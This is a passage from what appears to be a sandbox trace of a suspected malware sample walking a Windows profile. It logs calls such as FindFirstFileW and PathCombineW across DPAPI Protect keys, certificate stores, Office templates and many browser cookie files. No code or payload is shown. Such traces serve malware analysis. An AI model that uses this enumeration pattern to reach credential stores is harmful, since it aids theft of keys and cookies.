returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*" [0083.212] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.213] PathMatchSpecW (pszFile="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", pszSpec="*") returned 1 [0083.213] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0083.213] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.213] PathMatchSpecW (pszFile="SYNCHIST", pszSpec="*") returned 1 [0083.213] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.213] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Publisher" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher" [0083.214] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*" [0083.214] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.214] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.214] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Publisher Building Blocks" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0083.214] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*" [0083.214] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.215] PathMatchSpecW (pszFile="ContentStore.xml", pszSpec="*") returned 1 [0083.215] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.215] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Speech" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech" [0083.215] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*" [0083.215] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.215] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.215] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="SystemCertificates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0083.215] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0083.215] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.216] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="My" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0083.216] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0083.216] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.216] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="Certificates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0083.216] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0083.216] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.216] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.216] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CRLs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0083.216] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0083.216] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.216] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.216] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CTLs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0083.216] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0083.216] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.216] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.216] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.216] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.217] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Templates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates" [0083.217] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*" [0083.217] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.217] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates", pszFile="LiveContent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0083.217] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*" [0083.217] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.217] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0083.217] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*" [0083.217] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.217] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="Managed" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0083.217] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*" [0083.217] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.219] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="Access Parts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts" [0083.219] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*" [0083.219] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.219] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033" [0083.219] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*" [0083.219] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Access Parts\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.219] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.219] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.219] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="Document Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0083.219] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*" [0083.219] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.219] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0083.219] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*" [0083.219] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.220] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.220] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.220] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.220] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="User" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0083.220] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*" [0083.220] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.221] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", pszFile="Document Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0083.221] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*" [0083.221] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.221] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0083.221] PathCombineW (in: pszDest=0x18c500, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*" [0083.221] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.221] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.221] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.221] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.221] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.221] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.221] PathMatchSpecW (pszFile="Normal.dotm", pszSpec="*") returned 1 [0083.221] PathMatchSpecW (pszFile="~$Normal.dotm", pszSpec="*") returned 1 [0083.221] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.221] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="UProof" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof" [0083.221] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*" [0083.221] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.222] PathMatchSpecW (pszFile="CUSTOM.DIC", pszSpec="*") returned 1 [0083.222] PathMatchSpecW (pszFile="ExcludeDictionaryEN0409.lex", pszSpec="*") returned 1 [0083.222] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.222] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Windows" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows" [0083.222] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*" [0083.222] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.222] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Cookies" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies" [0083.222] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*" [0083.222] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.222] PathMatchSpecW (pszFile="aetadzjz@g.live[1].txt", pszSpec="*") returned 1 [0083.222] PathMatchSpecW (pszFile="aetadzjz@google[2].txt", pszSpec="*") returned 1 [0083.222] PathMatchSpecW (pszFile="aetadzjz@live[1].txt", pszSpec="*") returned 1 [0083.222] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.222] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low" [0083.222] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*" [0083.222] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.227] PathMatchSpecW (pszFile="aetadzjz@ad.360yield[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@ad13.adfarm1.adition[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@addthis[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@adfarm1.adition[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@adformdsp[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@adform[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@adnxs[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@adscale[1].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@adserving.ancoraplatform[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@adsrvr[1].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@adtech[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@advertising[1].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@angsrvr[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@api.bing[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@at.atwola[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@bidswitch[1].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@bing[1].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@bluekai[1].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@bs.serving-sys[1].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@bs.serving-sys[3].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@c.bing[1].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@c.msn[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW (pszFile="aetadzjz@c1.microsoft[2].txt", pszSpec="*") returned 1 [0083.227] PathMatchSpecW 